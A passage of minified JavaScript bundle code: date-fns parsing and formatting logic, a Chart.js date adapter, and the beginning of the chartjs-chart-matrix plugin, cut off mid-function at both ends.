D(e.length,t,a)}},validate:function(t,e,n){return e.isTwoDigitYear||0<e.year},set:function(t,e,n,r){var a=t.getUTCFullYear();return n.isTwoDigitYear?(a=jt(n.year,a),t.setUTCFullYear(a,0,1),t.setUTCHours(0,0,0,0)):(a="era"in e&&1!==e.era?1-n.year:n.year,t.setUTCFullYear(a,0,1),t.setUTCHours(0,0,0,0)),t},incompatibleTokens:["Y","R","u","w","I","i","e","c","t","T"]},Y:{priority:130,parse:function(t,e,n,r){function a(t){return{year:t,isTwoDigitYear:"YY"===e}}switch(e){case"Y":return D(4,t,a);case"Yo":return n.ordinalNumber(t,{unit:"year",valueCallback:a});default:return D(e.length,t,a)}},validate:function(t,e,n){return e.isTwoDigitYear||0<e.year},set:function(t,e,n,r){var a=T(t,r);return n.isTwoDigitYear?(a=jt(n.year,a),t.setUTCFullYear(a,0,r.firstWeekContainsDate),t.setUTCHours(0,0,0,0)):(a="era"in e&&1!==e.era?1-n.year:n.year,t.setUTCFullYear(a,0,r.firstWeekContainsDate),t.setUTCHours(0,0,0,0)),v(t,r)},incompatibleTokens:["y","R","u","Q","q","M","L","I","d","D","i","t","T"]},R:{priority:130,parse:function(t,e,n,r){return Wt("R"===e?4:e.length,t)},set:function(t,e,n,r){var a=new Date(0);return a.setUTCFullYear(n,0,4),a.setUTCHours(0,0,0,0),b(a)},incompatibleTokens:["G","y","Y","u","Q","q","M","L","w","d","D","e","c","t","T"]},u:{priority:130,parse:function(t,e,n,r){return Wt("u"===e?4:e.length,t)},set:function(t,e,n,r){return t.setUTCFullYear(n,0,1),t.setUTCHours(0,0,0,0),t},incompatibleTokens:["G","y","Y","R","w","I","i","e","c","t","T"]},Q:{priority:120,parse:function(t,e,n,r){switch(e){case"Q":case"QQ":return D(e.length,t);case"Qo":return n.ordinalNumber(t,{unit:"quarter"});case"QQQ":return n.quarter(t,{width:"abbreviated",context:"formatting"})||n.quarter(t,{width:"narrow",context:"formatting"});case"QQQQQ":return n.quarter(t,{width:"narrow",context:"formatting"});default:return n.quarter(t,{width:"wide",context:"formatting"})||n.quarter(t,{width:"abbreviated",context:"formatting"})||n.quarter(t,{width:"narrow",context:"formatting"})}},validate:function(t,e,n){return 1<=e&&e<=4},set:function(t,e,n,r){return t.setUTCMonth(3*(n-1),1),t.setUTCHours(0,0,0,0),t},incompatibleTokens:["Y","R","q","M","L","w","I","d","D","i","e","c","t","T"]},q:{priority:120,parse:function(t,e,n,r){switch(e){case"q":case"qq":return D(e.length,t);case"qo":return n.ordinalNumber(t,{unit:"quarter"});case"qqq":return n.quarter(t,{width:"abbreviated",context:"standalone"})||n.quarter(t,{width:"narrow",context:"standalone"});case"qqqqq":return n.quarter(t,{width:"narrow",context:"standalone"});default:return n.quarter(t,{width:"wide",context:"standalone"})||n.quarter(t,{width:"abbreviated",context:"standalone"})||n.quarter(t,{width:"narrow",context:"standalone"})}},validate:function(t,e,n){return 1<=e&&e<=4},set:function(t,e,n,r){return t.setUTCMonth(3*(n-1),1),t.setUTCHours(0,0,0,0),t},incompatibleTokens:["Y","R","Q","M","L","w","I","d","D","i","e","c","t","T"]},M:{priority:110,parse:function(t,e,n,r){function a(t){return t-1}switch(e){case"M":return M(mt,t,a);case"MM":return D(2,t,a);case"Mo":return n.ordinalNumber(t,{unit:"month",valueCallback:a});case"MMM":return n.month(t,{width:"abbreviated",context:"formatting"})||n.month(t,{width:"narrow",context:"formatting"});case"MMMMM":return n.month(t,{width:"narrow",context:"formatting"});default:return n.month(t,{width:"wide",context:"formatting"})||n.month(t,{width:"abbreviated",context:"formatting"})||n.month(t,{width:"narrow",context:"formatting"})}},validate:function(t,e,n){return 0<=e&&e<=11},set:function(t,e,n,r){return t.setUTCMonth(n,1),t.setUTCHours(0,0,0,0),t},incompatibleTokens:["Y","R","q","Q","L","w","I","D","i","e","c","t","T"]},L:{priority:110,parse:function(t,e,n,r){function a(t){return t-1}switch(e){case"L":return M(mt,t,a);case"LL":return D(2,t,a);case"Lo":return n.ordinalNumber(t,{unit:"month",valueCallback:a});case"LLL":return n.month(t,{width:"abbreviated",context:"standalone"})||n.month(t,{width:"narrow",context:"standalone"});case"LLLLL":return n.month(t,{width:"narrow",context:"standalone"});default:return n.month(t,{width:"wide",context:"standalone"})||n.month(t,{width:"abbreviated",context:"standalone"})||n.month(t,{width:"narrow",context:"standalone"})}},validate:function(t,e,n){return 0<=e&&e<=11},set:function(t,e,n,r){return t.setUTCMonth(n,1),t.setUTCHours(0,0,0,0),t},incompatibleTokens:["Y","R","q","Q","M","w","I","D","i","e","c","t","T"]},w:{priority:100,parse:function(t,e,n,r){switch(e){case"w":return M(yt,t);case"wo":return n.ordinalNumber(t,{unit:"week"});default:return D(e.length,t)}},validate:function(t,e,n){return 1<=e&&e<=53},set:function(t,e,n,r){return v(function(t,e,n){S(2,arguments);t=Y(t),e=U(e),n=J(t,n)-e;return t.setUTCDate(t.getUTCDate()-7*n),t}(t,n,r),r)},incompatibleTokens:["y","R","u","q","Q","M","L","I","d","D","i","t","T"]},I:{priority:100,parse:function(t,e,n,r){switch(e){case"I":return M(yt,t);case"Io":return n.ordinalNumber(t,{unit:"week"});default:return D(e.length,t)}},validate:function(t,e,n){return 1<=e&&e<=53},set:function(t,e,n,r){return b(function(t,e){S(2,arguments);t=Y(t),e=U(e),e=$(t)-e;return t.setUTCDate(t.getUTCDate()-7*e),t}(t,n,r),r)},incompatibleTokens:["y","Y","u","q","Q","M","L","w","d","D","e","c","t","T"]},d:{priority:90,subPriority:1,parse:function(t,e,n,r){switch(e){case"d":return M(gt,t);case"do":return n.ordinalNumber(t,{unit:"date"});default:return D(e.length,t)}},validate:function(t,e,n){var r=It(t.getUTCFullYear()),t=t.getUTCMonth();return r?1<=e&&e<=Qt[t]:1<=e&&e<=Lt[t]},set:function(t,e,n,r){return t.setUTCDate(n),t.setUTCHours(0,0,0,0),t},incompatibleTokens:["Y","R","q","Q","w","I","D","i","e","c","t","T"]},D:{priority:90,subPriority:1,parse:function(t,e,n,r){switch(e){case"D":case"DD":return M(wt,t);case"Do":return n.ordinalNumber(t,{unit:"date"});default:return D(e.length,t)}},validate:function(t,e,n){return It(t.getUTCFullYear())?1<=e&&e<=366:1<=e&&e<=365},set:function(t,e,n,r){return t.setUTCMonth(0,n),t.setUTCHours(0,0,0,0),t},incompatibleTokens:["Y","R","q","Q","M","L","w","I","d","E","i","e","c","t","T"]},E:{priority:90,parse:function(t,e,n,r){switch(e){case"E":case"EE":case"EEE":return n.day(t,{width:"abbreviated",context:"formatting"})||n.day(t,{width:"short",context:"formatting"})||n.day(t,{width:"narrow",context:"formatting"});case"EEEEE":return n.day(t,{width:"narrow",context:"formatting"});case"EEEEEE":return n.day(t,{width:"short",context:"formatting"})||n.day(t,{width:"narrow",context:"formatting"});default:return n.day(t,{width:"wide",context:"formatting"})||n.day(t,{width:"abbreviated",context:"formatting"})||n.day(t,{width:"short",context:"formatting"})||n.day(t,{width:"narrow",context:"formatting"})}},validate:function(t,e,n){return 0<=e&&e<=6},set:function(t,e,n,r){return(t=x(t,n,r)).setUTCHours(0,0,0,0),t},incompatibleTokens:["D","i","e","c","t","T"]},e:{priority:90,parse:function(t,e,n,r){function a(t){var e=7*Math.floor((t-1)/7);return(t+r.weekStartsOn+6)%7+e}switch(e){case"e":case"ee":return D(e.length,t,a);case"eo":return n.ordinalNumber(t,{unit:"day",valueCallback:a});case"eee":return n.day(t,{width:"abbreviated",context:"formatting"})||n.day(t,{width:"short",context:"formatting"})||n.day(t,{width:"narrow",context:"formatting"});case"eeeee":return n.day(t,{width:"narrow",context:"formatting"});case"eeeeee":return n.day(t,{width:"short",context:"formatting"})||n.day(t,{width:"narrow",context:"formatting"});default:return n.day(t,{width:"wide",context:"formatting"})||n.day(t,{width:"abbreviated",context:"formatting"})||n.day(t,{width:"short",context:"formatting"})||n.day(t,{width:"narrow",context:"formatting"})}},validate:function(t,e,n){return 0<=e&&e<=6},set:function(t,e,n,r){return(t=x(t,n,r)).setUTCHours(0,0,0,0),t},incompatibleTokens:["y","R","u","q","Q","M","L","I","d","D","E","i","c","t","T"]},c:{priority:90,parse:function(t,e,n,r){function a(t){var e=7*Math.floor((t-1)/7);return(t+r.weekStartsOn+6)%7+e}switch(e){case"c":case"cc":return D(e.length,t,a);case"co":return n.ordinalNumber(t,{unit:"day",valueCallback:a});case"ccc":return n.day(t,{width:"abbreviated",context:"standalone"})||n.day(t,{width:"short",context:"standalone"})||n.day(t,{width:"narrow",context:"standalone"});case"ccccc":return n.day(t,{width:"narrow",context:"standalone"});case"cccccc":return n.day(t,{width:"short",context:"standalone"})||n.day(t,{width:"narrow",context:"standalone"});default:return n.day(t,{width:"wide",context:"standalone"})||n.day(t,{width:"abbreviated",context:"standalone"})||n.day(t,{width:"short",context:"standalone"})||n.day(t,{width:"narrow",context:"standalone"})}},validate:function(t,e,n){return 0<=e&&e<=6},set:function(t,e,n,r){return(t=x(t,n,r)).setUTCHours(0,0,0,0),t},incompatibleTokens:["y","R","u","q","Q","M","L","I","d","D","E","i","e","t","T"]},i:{priority:90,parse:function(t,e,n,r){function a(t){return 0===t?7:t}switch(e){case"i":case"ii":return D(e.length,t);case"io":return n.ordinalNumber(t,{unit:"day"});case"iii":return n.day(t,{width:"abbreviated",context:"formatting",valueCallback:a})||n.day(t,{width:"short",context:"formatting",valueCallback:a})||n.day(t,{width:"narrow",context:"formatting",valueCallback:a});case"iiiii":return n.day(t,{width:"narrow",context:"formatting",valueCallback:a});case"iiiiii":return n.day(t,{width:"short",context:"formatting",valueCallback:a})||n.day(t,{width:"narrow",context:"formatting",valueCallback:a});default:return n.day(t,{width:"wide",context:"formatting",valueCallback:a})||n.day(t,{width:"abbreviated",context:"formatting",valueCallback:a})||n.day(t,{width:"short",context:"formatting",valueCallback:a})||n.day(t,{width:"narrow",context:"formatting",valueCallback:a})}},validate:function(t,e,n){return 1<=e&&e<=7},set:function(t,e,n,r){return(t=function(t,e){S(2,arguments);e=U(e),e%7==0&&(e-=7),t=Y(t),e=((e%7+7)%7<1?7:0)+e-t.getUTCDay();return t.setUTCDate(t.getUTCDate()+e),t}(t,n,r)).setUTCHours(0,0,0,0),t},incompatibleTokens:["y","Y","u","q","Q","M","L","w","d","D","E","e","c","t","T"]},a:{priority:80,parse:function(t,e,n,r){switch(e){case"a":case"aa":case"aaa":return n.dayPeriod(t,{width:"abbreviated",context:"formatting"})||n.dayPeriod(t,{width:"narrow",context:"formatting"});case"aaaaa":return n.dayPeriod(t,{width:"narrow",context:"formatting"});default:return n.dayPeriod(t,{width:"wide",context:"formatting"})||n.dayPeriod(t,{width:"abbreviated",context:"formatting"})||n.dayPeriod(t,{width:"narrow",context:"formatting"})}},set:function(t,e,n,r){return t.setUTCHours(P(n),0,0,0),t},incompatibleTokens:["b","B","H","K","k","t","T"]},b:{priority:80,parse:function(t,e,n,r){switch(e){case"b":case"bb":case"bbb":return n.dayPeriod(t,{width:"abbreviated",context:"formatting"})||n.dayPeriod(t,{width:"narrow",context:"formatting"});case"bbbbb":return n.dayPeriod(t,{width:"narrow",context:"formatting"});default:return n.dayPeriod(t,{width:"wide",context:"formatting"})||n.dayPeriod(t,{width:"abbreviated",context:"formatting"})||n.dayPeriod(t,{width:"narrow",context:"formatting"})}},set:function(t,e,n,r){return t.setUTCHours(P(n),0,0,0),t},incompatibleTokens:["a","B","H","K","k","t","T"]},B:{priority:80,parse:function(t,e,n,r){switch(e){case"B":case"BB":case"BBB":return n.dayPeriod(t,{width:"abbreviated",context:"formatting"})||n.dayPeriod(t,{width:"narrow",context:"formatting"});case"BBBBB":return n.dayPeriod(t,{width:"narrow",context:"formatting"});default:return n.dayPeriod(t,{width:"wide",context:"formatting"})||n.dayPeriod(t,{width:"abbreviated",context:"formatting"})||n.dayPeriod(t,{width:"narrow",context:"formatting"})}},set:function(t,e,n,r){return t.setUTCHours(P(n),0,0,0),t},incompatibleTokens:["a","b","t","T"]},h:{priority:70,parse:function(t,e,n,r){switch(e){case"h":return M(Tt,t);case"ho":return n.ordinalNumber(t,{unit:"hour"});default:return D(e.length,t)}},validate:function(t,e,n){return 1<=e&&e<=12},set:function(t,e,n,r){var a=12<=t.getUTCHours();return a&&n<12?t.setUTCHours(n+12,0,0,0):a||12!==n?t.setUTCHours(n,0,0,0):t.setUTCHours(0,0,0,0),t},incompatibleTokens:["H","K","k","t","T"]},H:{priority:70,parse:function(t,e,n,r){switch(e){case"H":return M(pt,t);case"Ho":return n.ordinalNumber(t,{unit:"hour"});default:return D(e.length,t)}},validate:function(t,e,n){return 0<=e&&e<=23},set:function(t,e,n,r){return t.setUTCHours(n,0,0,0),t},incompatibleTokens:["a","b","h","K","k","t","T"]},K:{priority:70,parse:function(t,e,n,r){switch(e){case"K":return M(vt,t);case"Ko":return n.ordinalNumber(t,{unit:"hour"});default:return D(e.length,t)}},validate:function(t,e,n){return 0<=e&&e<=11},set:function(t,e,n,r){return 12<=t.getUTCHours()&&n<12?t.setUTCHours(n+12,0,0,0):t.setUTCHours(n,0,0,0),t},incompatibleTokens:["a","b","h","H","k","t","T"]},k:{priority:70,parse:function(t,e,n,r){switch(e){case"k":return M(bt,t);case"ko":return n.ordinalNumber(t,{unit:"hour"});default:return D(e.length,t)}},validate:function(t,e,n){return 1<=e&&e<=24},set:function(t,e,n,r){return t.setUTCHours(n<=24?n%24:n,0,0,0),t},incompatibleTokens:["a","b","h","H","K","t","T"]},m:{priority:60,parse:function(t,e,n,r){switch(e){case"m":return M(Ct,t);case"mo":return n.ordinalNumber(t,{unit:"minute"});default:return D(e.length,t)}},validate:function(t,e,n){return 0<=e&&e<=59},set:function(t,e,n,r){return t.setUTCMinutes(n,0,0),t},incompatibleTokens:["t","T"]},s:{priority:50,parse:function(t,e,n,r){switch(e){case"s":return M(xt,t);case"so":return n.ordinalNumber(t,{unit:"second"});default:return D(e.length,t)}},validate:function(t,e,n){return 0<=e&&e<=59},set:function(t,e,n,r){return t.setUTCSeconds(n,0),t},incompatibleTokens:["t","T"]},S:{priority:30,parse:function(t,e,n,r){return D(e.length,t,function(t){return Math.floor(t*Math.pow(10,3-e.length))})},set:function(t,e,n,r){return t.setUTCMilliseconds(n),t},incompatibleTokens:["t","T"]},X:{priority:10,parse:function(t,e,n,r){switch(e){case"X":return k(Et,t);case"XX":return k(qt,t);case"XXXX":return k(_t,t);case"XXXXX":return k(Rt,t);default:return k(Ht,t)}},set:function(t,e,n,r){return e.timestampIsSet?t:new Date(t.getTime()-n)},incompatibleTokens:["t","T","x"]},x:{priority:10,parse:function(t,e,n,r){switch(e){case"x":return k(Et,t);case"xx":return k(qt,t);case"xxxx":return k(_t,t);case"xxxxx":return k(Rt,t);default:return k(Ht,t)}},set:function(t,e,n,r){return e.timestampIsSet?t:new Date(t.getTime()-n)},incompatibleTokens:["t","T","X"]},t:{priority:40,parse:function(t,e,n,r){return Ft(t)},set:function(t,e,n,r){return[new Date(1e3*n),{timestampIsSet:!0}]},incompatibleTokens:"*"},T:{priority:20,parse:function(t,e,n,r){return Ft(t)},set:function(t,e,n,r){return[new Date(n),{timestampIsSet:!0}]},incompatibleTokens:"*"}},Xt=/[yYQqMLwIdDecihHKkms]o|(\w)\1*|''|'(''|[^'])+('|$)|./g,zt=/P+p+|P+|p+|''|'(''|[^'])+('|$)|./g,Gt=/^'([^]*?)'?$/,At=/''/g,Kt=/\S/,Zt=/[a-zA-Z]/;function $t(t,e){return e.timestampIsSet?t:((e=new Date(0)).setFullYear(t.getUTCFullYear(),t.getUTCMonth(),t.getUTCDate()),e.setHours(t.getUTCHours(),t.getUTCMinutes(),t.getUTCSeconds(),t.getUTCMilliseconds()),e)}var E={dateTimeDelimiter:/[T ]/,timeZoneDelimiter:/[Z ]/i,timezone:/([Z+-].*)$/},Jt=/^-?(?:(\d{3})|(\d{2})(?:-?(\d{2}))?|W(\d{2})(?:-?(\d{1}))?|)$/,Vt=/^(\d{2}(?:[.,]\d*)?)(?::?(\d{2}(?:[.,]\d*)?))?(?::?(\d{2}(?:[.,]\d*)?))?$/,te=/^([+-])(\d{2})(?::?(\d{2}))?$/;function q(t){return t?parseInt(t):1}function _(t){return t&&parseFloat(t.replace(",","."))||0}var ee=[31,null,31,30,31,30,31,31,30,31,30,31];function ne(t){return t%400==0||t%4==0&&t%100}var re={datetime:"MMM d, yyyy, h:mm:ss aaaa",millisecond:"h:mm:ss.SSS aaaa",second:"h:mm:ss aaaa",minute:"h:mm aaaa",hour:"ha",day:"MMM d",week:"PP",month:"MMM yyyy",quarter:"qqq - yyyy",year:"yyyy"};H._adapters._date.override({_id:"date-fns",formats:function(){return re},parse:function(t,e){var n;return null!=t&&("number"===(n=_typeof(t))||t instanceof Date?t=Y(t):"string"===n&&(t="string"==typeof e?function(t,e,n,r){S(3,arguments);var a=String(t),i=String(e),o=r||{},u=o.locale||j;if(!u.match)throw new RangeError("locale must contain match property");e=u.options&&u.options.firstWeekContainsDate,r=null==e?1:U(e),e=null==o.firstWeekContainsDate?r:U(o.firstWeekContainsDate);if(!(1<=e&&e<=7))throw new RangeError("firstWeekContainsDate must be between 1 and 7 inclusively");r=u.options&&u.options.weekStartsOn,r=null==r?0:U(r),r=null==o.weekStartsOn?r:U(o.weekStartsOn);if(!(0<=r&&r<=6))throw new RangeError("weekStartsOn must be between 0 and 6 inclusively");if(""===i)return""===a?Y(n):new Date(NaN);for(var s={firstWeekContainsDate:e,weekStartsOn:r,locale:u},c=[{priority:10,subPriority:-1,set:$t,index:0}],d=i.match(zt).map(function(t){var e=t[0];return"p"===e||"P"===e?(0,at[e])(t,u.formatLong,s):t}).join("").match(Xt),l=[],f=0;f<d.length;f++){var h=d[f],m=(!o.useAdditionalWeekYearTokens&&st(h)&&O(h,i,t),!o.useAdditionalDayOfYearTokens&&ut(h)&&O(h,i,t),h[0]),g=Bt[m];if(g){var w=g.incompatibleTokens;if(Array.isArray(w)){for(var y=void 0,p=0;p<l.length;p++){var b=l[p].token;if(-1!==w.indexOf(b)||b===m){y=l[p];break}}if(y)throw new RangeError("The format string mustn't contain `".concat(y.fullToken,"` and `").concat(h,"` at the same time"))}else if("*"===g.incompatibleTokens&&l.length)throw new RangeError("The format string mustn't contain `".concat(h,"` and any other token at the same time"));l.push({token:m,fullToken:h});var v=g.parse(a,h,u.match,s);if(!v)return new Date(NaN);c.push({priority:g.priority,subPriority:g.subPriority||0,set:g.set,validate:g.validate,value:v.value,index:c.length}),a=v.rest}else{if(m.match(Zt))throw new RangeError("Format string contains an unescaped latin alphabet character `"+m+"`");if("''"===h?h="'":"'"===m&&(h=h.match(Gt)[1].replace(At,"'")),0!==a.indexOf(h))return new Date(NaN);a=a.slice(h.length)}}if(0<a.length&&Kt.test(a))return new Date(NaN);var T=c.map(function(t){return t.priority}).sort(function(t,e){return e-t}).filter(function(t,e,n){return n.indexOf(t)===e}).map(function(e){return c.filter(function(t){return t.priority===e}).sort(function(t,e){return e.subPriority-t.subPriority})}).map(function(t){return t[0]}),e=Y(n);if(isNaN(e))return new Date(NaN);var C=L(e,N(e)),x={};for(f=0;f<T.length;f++){var M=T[f];if(M.validate&&!M.validate(C,M.value,s))return new Date(NaN);M=M.set(C,x,M.value,s);if(M[0]){C=M[0];{k=void 0;D=void 0;P=void 0;var k=x;var D=M[1];if(null==k)throw new TypeError("assign requires that input parameter not be null or undefined");for(var P in D=D||{})D.hasOwnProperty(P)&&(k[P]=D[P])}}else C=M}return C}(t,e,new Date,this.options):function(t,e){S(1,arguments);var n,r,a,i,o,u,s,c,e=e||{},e=null==e.additionalDigits?2:U(e.additionalDigits);if(2!==e&&1!==e&&0!==e)throw new RangeError("additionalDigits must be 0, 1 or 2");return"string"!=typeof t&&"[object String]"!==Object.prototype.toString.call(t)||(a={},2<(c=(t=t).split(E.dateTimeDelimiter)).length||(/:/.test(c[0])?(a.date=null,r=c[0]):(a.date=c[0],r=c[1],E.timeZoneDelimiter.test(a.date)&&(a.date=t.split(E.timeZoneDelimiter)[0],r=t.substr(a.date.length,t.length))),r&&((c=E.timezone.exec(r))?(a.time=r.replace(c[1],""),a.timezone=c[1]):a.time=r)),(t=a).date&&(c=t.date,r=e,r=new RegExp("^(?:(\\d{4}|[+-]\\d{"+(4+r)+"})|(\\d{2}|[+-]\\d{"+(2+r)+"})$)"),a=(r=c.match(r))?(a=r[1]&&parseInt(r[1]),{year:null==(e=r[2]&&parseInt(r[2]))?a:100*e,restDateString:c.slice((r[1]||r[2]).length)}):{year:null},e=a.restDateString,n=null!==(c=a.year)&&(e=e.match(Jt))?(a=!!e[4],o=q(e[1]),i=q(e[2])-1,u=q(e[3]),s=q(e[4]),e=q(e[5])-1,a?1<=s&&s<=53&&0<=e&&e<=6?(a=c,(n=new Date(0)).setUTCFullYear(a,0,4),a=7*(s-1)+e+1-(n.getUTCDay()||7),n.setUTCDate(n.getUTCDate()+a),n):new Date(NaN):(s=new Date(0),0<=i&&i<=11&&1<=u&&u<=(ee[i]||(ne(c)?29:28))&&1<=o&&o<=(ne(c)?366:365)?(s.setUTCFullYear(c,i,Math.max(o,u)),s):new Date(NaN))):null),isNaN(n))||!n||(e=n.getTime(),a=0,t.time&&(a=(c=(c=t.time).match(Vt))?(i=_(c[1]),o=_(c[2]),c=_(c[3]),(24===i?0===o&&0===c:0<=c&&c<60&&0<=o&&o<60&&0<=i&&i<25)?36e5*i+6e4*o+1e3*c:NaN):null,isNaN(a)||null===a))?new Date(NaN):t.timezone?(t="Z"!==(u=t.timezone)&&(u=u.match(te))?(s="+"===u[1]?-1:1,c=parseInt(u[2]),0<=(u=u[3]&&parseInt(u[3])||0)&&u<=59?s*(36e5*c+6e4*u):NaN):0,isNaN(t)?new Date(NaN):new Date(e+a+t)):(c=new Date(e+a),(t=new Date(0)).setFullYear(c.getUTCFullYear(),c.getUTCMonth(),c.getUTCDate()),t.setHours(c.getUTCHours(),c.getUTCMinutes(),c.getUTCSeconds(),c.getUTCMilliseconds()),t)}(t,this.options)),d(t))?t.getTime():null},format:function(t,e){return function(r,a,t){S(2,arguments);var e=String(a),i=t||{},o=i.locale||j,t=o.options&&o.options.firstWeekContainsDate,t=null==t?1:U(t),t=null==i.firstWeekContainsDate?t:U(i.firstWeekContainsDate);if(!(1<=t&&t<=7))throw new RangeError("firstWeekContainsDate must be between 1 and 7 inclusively");var n=o.options&&o.options.weekStartsOn,n=null==n?0:U(n),n=null==i.weekStartsOn?n:U(i.weekStartsOn);if(!(0<=n&&n<=6))throw new RangeError("weekStartsOn must be between 0 and 6 inclusively");if(!o.localize)throw new RangeError("locale must contain localize property");if(!o.formatLong)throw new RangeError("locale must contain formatLong property");var u,s,c=Y(r);if(d(c))return u=L(c,N(c)),s={firstWeekContainsDate:t,weekStartsOn:n,locale:o,_originalDate:c},e.match(dt).map(function(t){var e=t[0];return"p"===e||"P"===e?(0,at[e])(t,o.formatLong,s):t}).join("").match(ct).map(function(t){if("''"===t)return"'";var e=t[0];if("'"===e)return t.match(lt)[1].replace(ft,"'");var n=et[e];if(n)return!i.useAdditionalWeekYearTokens&&st(t)&&O(t,a,r),!i.useAdditionalDayOfYearTokens&&ut(t)&&O(t,a,r),n(u,t,o.localize,s);if(e.match(ht))throw new RangeError("Format string contains an unescaped latin alphabet character `"+e+"`");return t}).join("");throw new RangeError("Invalid time value")}(t,e,this.options)},add:function(t,e,n){switch(n){case"millisecond":return i(t,e);case"second":return function(t,e){return S(2,arguments),i(t,1e3*U(e))}(t,e);case"minute":return function(t,e){return S(2,arguments),i(t,6e4*U(e))}(t,e);case"hour":return function(t,e){return S(2,arguments),i(t,36e5*U(e))}(t,e);case"day":return r(t,e);case"week":return function(t,e){return S(2,arguments),r(t,7*U(e))}(t,e);case"month":return a(t,e);case"quarter":return function(t,e){return S(2,arguments),a(t,3*U(e))}(t,e);case"year":return function(t,e){return S(2,arguments),a(t,12*U(e))}(t,e);default:return t}},diff:function(t,e,n){switch(n){case"millisecond":return f(t,e);case"second":return function(t,e){S(2,arguments);t=f(t,e)/1e3;return 0<t?Math.floor(t):Math.ceil(t)}(t,e);case"minute":return function(t,e){S(2,arguments);t=f(t,e)/6e4;return 0<t?Math.floor(t):Math.ceil(t)}(t,e);case"hour":return function(t,e){S(2,arguments);t=f(t,e)/36e5;return 0<t?Math.floor(t):Math.ceil(t)}(t,e);case"day":return l(t,e);case"week":return function(t,e){S(2,arguments);t=l(t,e)/7;return 0<t?Math.floor(t):Math.ceil(t)}(t,e);case"month":return g(t,e);case"quarter":return function(t,e){S(2,arguments);t=g(t,e)/3;return 0<t?Math.floor(t):Math.ceil(t)}(t,e);case"year":return function(t,e){S(2,arguments);var t=Y(t),e=Y(e),n=s(t,e),r=Math.abs(function(t,e){return S(2,arguments),t=Y(t),e=Y(e),t.getFullYear()-e.getFullYear()}(t,e));t.setFullYear("1584"),e.setFullYear("1584");r=n*(r-(s(t,e)===-n));return 0==r?0:r}(t,e);default:return 0}},startOf:function(t,e,n){switch(e){case"second":return function(t){S(1,arguments);t=Y(t);return t.setMilliseconds(0),t}(t);case"minute":return function(t){S(1,arguments);t=Y(t);return t.setSeconds(0,0),t}(t);case"hour":return function(t){S(1,arguments);t=Y(t);return t.setMinutes(0,0,0),t}(t);case"day":return u(t);case"week":return o(t);case"isoWeek":return o(t,{weekStartsOn:+n});case"month":return function(t){S(1,arguments);t=Y(t);return t.setDate(1),t.setHours(0,0,0,0),t}(t);case"quarter":return function(t){S(1,arguments);var t=Y(t),e=t.getMonth();return t.setMonth(e-e%3,1),t.setHours(0,0,0,0),t}(t);case"year":return function(t){S(1,arguments);var t=Y(t),e=new Date(0);return e.setFullYear(t.getFullYear(),0,1),e.setHours(0,0,0,0),e}(t);default:return t}},endOf:function(t,e){switch(e){case"second":return function(t){S(1,arguments);t=Y(t);return t.setMilliseconds(999),t}(t);case"minute":return function(t){S(1,arguments);t=Y(t);return t.setSeconds(59,999),t}(t);case"hour":return function(t){S(1,arguments);t=Y(t);return t.setMinutes(59,59,999),t}(t);case"day":return h(t);case"week":return function(t){S(1,arguments);var e={},n=e.locale,n=n&&n.options&&n.options.weekStartsOn,n=null==n?0:U(n),n=null==e.weekStartsOn?n:U(e.weekStartsOn);if(0<=n&&n<=6)return t=6+((t=(e=Y(t)).getDay())<n?-7:0)-(t-n),e.setDate(e.getDate()+t),e.setHours(23,59,59,999),e;throw new RangeError("weekStartsOn must be between 0 and 6 inclusively")}(t);case"month":return m(t);case"quarter":return function(t){S(1,arguments);var t=Y(t),e=t.getMonth();return t.setMonth(e-e%3+3,0),t.setHours(23,59,59,999),t}(t);case"year":return function(t){S(1,arguments);var t=Y(t),e=t.getFullYear();return t.setFullYear(e+1,0,0),t.setHours(23,59,59,999),t}(t);default:return t}}})}),function(t,e){"object"==("undefined"==typeof exports?"undefined":_typeof(exports))&&"undefined"!=typeof module?e(exports,require("chart.js"),require("chart.js/helpers")):"function"==typeof define&&define.amd?define(["exports","chart.js","chart.js/helpers"],e):e((t="undefined"!=typeof globalThis?globalThis:self)["chartjs-chart-matrix"]={},t.Chart,t.Chart.helpers)}(void 0,function(t,e,f){var n=function(){function t(){return _classCallCheck(this,t),_callSuper(this,t,arguments)}return _inherits(t,e.DatasetController),_createClass(t,[{key:"initialize",value:function(){this.enableOptionSharing=!0,_get(_getPrototypeOf(t.prototype),"initialize",this).call(this)}},{key:"update",value:function(t){var e=this._cachedMeta;this.updateElements(e.data,0,e.data.length,t)}},{key:"updateElements",value:function(t,e,n,r){for(var a,i=this,o="reset"===r,u=i._cachedMeta,s=u.xScale,c=u.yScale,u=i.resolveDataElementOptions(e,r),u=i.getSharedOptions(r,t[e],u),d=e;d<e+n;d++){var l=!o&&i.getParsed(d),f=o?s.getBasePixel():s.getPixelForValue(l.x),l=o?c.getBasePixel():c.getPixelForValue(l.y),h=i.resolveDataElementOptions(d,r),m=h.width,g=h.height,w=h.anchorX,y=h.anchorY,l={x:(f=f,a=m,"left"===(w=w)||"start"===w?f:"right"===w||"end"===w?f-a:f-a/2),y:(w=l,f=g,"top"===(a=y)||"start"===a?w:"bottom"===a||"end"===a?w-f:w-f/2),width:m,height:g,options:h};i.updateElement(t[d],d,l,r)}i.updateSharedOptions(u,r)}},{key:"draw",value:function(){for(var t=this.getMeta().data||[],e=0,n=t.length;e<n;++e)t[e].draw(this._ctx)}}])}();function h(t,e){var t=t.getProps(["x","y","width","height"],e),e=t.x,n=t.y;return{left:e,top:n,right:e+t.width,bottom:n+t.height}}function m(t,e,n){return Math.max(Math.min(t,n),e)}function r(t,e,n,r){var a=null===e,i=null===n,t=!(!t||a&&i)&&h(t,r);return t&&(a||e>=t.left&&e<=t.right)&&(i||n>=t.top&&n<=t.bottom)}_defineProperty(n,"id","matrix"),_defineProperty(n,"version","2.0.1"),_defineProperty(n,"defaults",{dataElementType:"matrix",animations:{numbers:{type:"number",properties:["x","y","width","height"]}}}),_defineProperty(n,"overrides",{interaction:{mode:"nearest",intersect:!0},scales:{x:{type:"linear",offset:!0},y:{type:"linear",reverse:!0}}});var a=function(){function n(t){var e;return _classCallCheck(this,n),(e=_callSuper(this,n)).options=void 0,e.width=void 0,e.height=void 0,t&&Object.assign(_assertThisInitialized(e),t),e}return _inherits(n,e.Element),_createClass(n,[{key:"draw",value:function(t){var 